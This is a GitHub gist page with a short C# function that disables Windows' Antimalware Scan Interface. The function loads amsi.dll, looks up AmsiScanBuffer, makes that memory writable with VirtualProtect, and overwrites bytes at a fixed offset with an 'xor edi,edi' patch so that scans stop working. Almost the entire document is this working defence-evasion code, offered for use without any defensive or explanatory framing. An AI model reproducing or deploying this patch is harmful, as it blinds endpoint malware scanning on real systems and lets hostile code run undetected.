Created
April 22, 2020 16:31
-
-
Save HopHouse/3876d6cf464caf899e75a6585e727400 to your computer and use it in GitHub Desktop.
Revisions
-
HopHouse created this gist
Apr 22, 2020 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,28 @@ public static string run() { IntPtr dllHandle = LoadLibrary("amsi.dll"); //load the amsi.dll if (dllHandle == null) return "error"; //Get the AmsiScanBuffer function address IntPtr AmsiScanbufferAddr = GetProcAddress(dllHandle, "AmsiScanBuffer"); if (AmsiScanbufferAddr == null) return "error"; IntPtr OldProtection = Marshal.AllocHGlobal(4); //pointer to store the current AmsiScanBuffer memory protection //Pointer changing the AmsiScanBuffer memory protection from readable only to writeable (0x40) bool VirtualProtectRc = VirtualProtect(AmsiScanbufferAddr, 0x0015, 0x40, OldProtection); if (VirtualProtectRc == false) return "error"; //The new patch opcode var patch = new byte[] {0x31,0xff,0x90}; //Setting a pointer to the patch opcode array (unmanagedPointer) IntPtr unmanagedPointer = Marshal.AllocHGlobal(3); Marshal.Copy(patch, 0, unmanagedPointer,3); //Patching the relevant line (the line which submits the rd8 to the edi register) with the xor edi,edi opcode MoveMemory(AmsiScanbufferAddr + 0x001b, unmanagedPointer, 3); return "OK"; }